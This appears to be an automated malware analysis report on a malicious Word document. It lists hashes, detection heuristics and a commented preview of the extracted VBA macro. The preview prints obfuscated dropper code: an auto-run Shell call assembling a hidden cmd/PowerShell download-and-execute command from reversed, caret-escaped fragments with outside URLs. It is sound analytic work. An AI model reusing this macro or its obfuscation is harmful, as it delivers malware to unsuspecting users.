Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7974ab215fab27f5…

MALICIOUS

Office (OLE)

67.9 KB Created: 2018-09-07 06:38:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 081d31d045f566869c94ca4140b04249 SHA-1: 523bd22e09e504195c92dde026d4acef6453b1ef SHA-256: 7974ab215fab27f56cbbfccde16afa5f400545136eee067ecf36e3b896d8f234
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical 'OLE_VBA_SHELL' heuristic indicates the use of the Shell() function, which is called from the Document_open macro to execute a command. The script constructs a command string at run time and executes it, most likely to download and run a second-stage payload. Because of the obfuscation, the exact command cannot be fully determined from static analysis alone, but the intent is clear.

Heuristics 5

  • ClamAV: Doc.Malware.Generic-6675131-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6675131-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    The VBA macro code calls Shell(), which is used to execute a command.
  • Document_Open macro high OLE_VBA_DOCOPEN
    The document contains a Document_Open macro, which runs when the document is opened.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5723 bytes
SHA-256: 7a926bd3151f93a4bb444331da450e742acf6e8734ca1490a2f6d51c5657ba47
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "UUMKOzROmNol"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-executing entry point: Word runs Document_open when the document is opened
' (this is the OLE_VBA_DOCOPEN finding). Its only real work is the Shell call below.
Private Sub Document_open()
' "On Error Resume Next", split across four continuation lines, suppresses every
' runtime error in this procedure, so a failure never surfaces a dialog to the user.
On _
Error _
Resume _
Next
' The command line is not stored anywhere as a literal: it is assembled here from the
' return values of several helper functions. ahLNf and zVYOzzH are defined further down
' in this preview; cGwADF, WhJotIkAnHBl, uppwltMdCoE, IPEZvWD, bacASWuCCoGuU and
' PLVjaBLGLFTqV are not shown here and are presumably built the same way. vbHide runs
' the resulting process with no visible window.
Shell Format(cGwADF) + WhJotIkAnHBl + uppwltMdCoE + ahLNf + zVYOzzH + IPEZvWD + bacASWuCCoGuU + PLVjaBLGLFTqV, vbHide
End Sub



Attribute VB_Name = "fVkvRIaLHiOzY"
' Returns one fragment of the command line that Document_open passes to Shell.
' Only the ten assignments (LQajYah .. XHjZzm) and the final concatenation on the
' "ahLNf = ..." line contribute to the result; every other statement is filler.
Function ahLNf()

' Same error suppression as in Document_open, again split over continuation lines.
On _
Error _
Resume _
Next
' The "Month ..." statements pass random-looking literals to VBA's Month() and
' discard the result. They add nothing to the return value; they only pad the
' code and break up the real assignments. Any runtime error they raise is
' swallowed by the handler above.
Month "XquhN" + "9785" + "Ss" + "ZIisfiiwu"
   Month "1513" + "328053512"
   Month "188487222" + "OSQ" + "NTCN" + "5292"
   Month "hU" + "397719252"
   Month "VXwmiqiQ" + "286483677" + "YtoBrK" + "S"
' Fragment 1. Chr(6 + 10 + 1 + 11 + 71) is Chr(99), the letter "c": the character
' code is hidden behind an arithmetic sum so the literal never appears in the
' source; the two other Chr() calls on this line hide an upper-case letter and a
' quotation mark the same way. The many "^" characters are cmd.exe escape
' characters, which cmd.exe drops when it parses the line, so they defeat simple
' string matching on the source without changing what eventually runs.
LQajYah = Chr(6 + 10 + 1 + 11 + 71) + "m" + "d /V^:" + "/" + Chr(4 + 7 + 0 + 7 + 49) + Chr(2 + 3 + 0 + 3 + 26) + "^" + "se^" + "t v^B" + "^s=^  ^" + "  ^"
Month "5437" + "qV"
   Month "zrBASGGRI" + "MHAHhqYQwWs" + "QZhMA" + "8976"
   Month "O" + "z" + "96098286" + "AnnoiwQ"
' Fragment 2. From here on the pieces are not in plain readable order; several
' look like text stored backwards (e.g. "ekov" + "nI" in fragment 3), which
' suggests the command re-orders them at run time — TODO confirm dynamically.
dGMwZiN = "    ^ " + "^  ^ " + "^ ^" + " ^  ^ " + "}}" + "{h" + Chr(6 + 10 + 1 + 11 + 71) + "t^a" + Chr(6 + 10 + 1 + 11 + 71) + "^}^" + ";kae" + "r^b;^d"
Month "OiD" + "299664965" + "L" + "Uz"
   Month "cDZabSF" + "K" + "2848" + "ukMi"
' Fragment 3.
hQnjCLFKao = "f^" + "w" + "$ ^m^" + "etI-" + "ekov" + "nI^;)df" + "w$^" + " ,^" + "D^Zd" + "$(e^l" + "^i^Fd" + "^" + "a^o^ln^"
Month "468163565" + "BqRi" + "1978" + "P"
   Month "v" + "2449" + "LpXhRc" + "vwN"
' Fragment 4.
iHzaCwsGmk = "wo^" + "D^.H" + "^Af^${" + "^yr^" + "t^"
Month "j" + "315781567" + "fbwuVhHXhhz" + "31248209"
   Month "sKHOk" + "8439" + "RUA" + "dSGHoXoiZjnu"
   Month "jdH" + "mDFioaYXzB" + "W" + "JKztOKUo"
   Month "ijjQamUCD" + "2048"
' Fragment 5.
NjlfRfWjhvc = "{)z" + "^d" + "^i^$" + "^ n^" + "i" + " ^"
Month "P" + "V"
   Month "sR" + "muOu" + "1197" + "vIwa"
   Month "490733698" + "TDzwbNLw" + "dlYzWOl" + "zPbcQnkm"
   Month "mw" + "RCHCWH" + "8839" + "jpAWQYIKjBLBz"
' Fragment 6. The same Chr() sum as above supplies the letter "c" twice more.
VWDjOf = "DZd^" + "$(^h" + Chr(6 + 10 + 1 + 11 + 71) + "a" + "er^o" + "f^;^'^e" + "x^e.^'" + "^" + "+E" + "^l^Q^$+" + "^'" + "\^'^+" + Chr(6 + 10 + 1 + 11 + 71) + "i^" + "l^b^u"
Month "vsUh" + "104123661" + "wjQCiGp" + "5683"
   Month "9781" + "5706" + "7476" + "53993045"
   Month "IK" + "wPvc" + "zDw" + "2886"
   Month "VL" + "404610404" + "269016478" + "KFS"
   Month "zkwPCnztM" + "vRuY"
' Fragment 7.
ZIKwzjujfV = "p^:" + "vn^e^$" + "^=d^f^" + "w^$^;'" + "5" + "^" + "4" + "' ^"
Month "422" + "388310628"
   Month "itF" + "pIaOfB" + "3812" + "3931"
' Fragment 8.
YvWWcCB = "= ^E^" + "lQ^$^;" + ")'@'(t" + "i" + "lp"
Month "lIEojWnrf" + "529501901" + "64541272" + "169400558"
   Month "209816862" + "4400" + "uXBj" + "mRD"
   Month "414" + "lJv" + "2805" + "iafC"
   Month "1722" + "QhRjmElYfC"
' Fragment 9.
YmXjjAtib = "S^.'" + "^m/mo" + Chr(6 + 10 + 1 + 11 + 71) + "^" + ".^" + "z" + "en" + "e^" + "m^i^j"
Month "tIlT" + "Amwa" + "3243" + "331170547"
   Month "477339906" + "4594"
   Month "9843" + "Wtuvnz"
' Fragment 10.
XHjZzm = "^" + "l^op" + "/" + "/^:pt^" + "t^h^" + "@5^m" + "k/^s^" + "ed^" + "ul" + Chr(6 + 10 + 1 + 11 + 71) + "ni/ni" + "m^d^a-"
' Return value: the ten fragments joined in assignment order. Nothing after this
' line affects the result.
ahLNf = LQajYah + dGMwZiN + hQnjCLFKao + iHzaCwsGmk + NjlfRfWjhvc + VWDjOf + ZIKwzjujfV + YvWWcCB + YmXjjAtib + XHjZzm
   Month "187544220" + "U" + "Alvcrp" + "Gi"
   Month "4585" + "bXQLisZmQcnX"
   Month "VcdhsWtiAsXprU" + "csv" + "skvnIvSs" + "mjbozPztQND"
   Month "NZoUm" + "iHrTQ"
   Month "Avca" + "259558613" + "GZCXFwbdnwczkB" + "AU"
End Function
Function zVYOzzH()

On _
Error _
Resume _
Next
Month "BwmidMPtTcQYzK" + "DO" + "onc" + "V"
   Month "m" + "G" + "105461822" + "1167"
   Month "220374061" + "249679058" + "311798076" + "mIn"
   Month "fWizKwmFaEzo" + "8941"
diCYmMZ = "pw/" + "^" + "mo" + Chr(6 + 10 + 1 + 11 + 71) + ".re" + "^ma" + "^g^it" + "^l^u" + "^.^ww" + "w/" + "/:^p" + "t^th" + "^@Rs^k" + "^Y^T"
Month "twqltJdd" + "9805" + "YG" + "493990139"
   Month "bVOiYXWz" + "389978724" + "104120289" + "Vw"
lmdOdNYPq = "^0/^mo" + Chr(6 + 10 + 1 + 11 + 71) + "^.r^e^" + "tt^e" + "rtre^" + "te"
Month "bBaVmw" + "1037" + "244603985" + "4228"
zaOzXYl = "p/
... (truncated)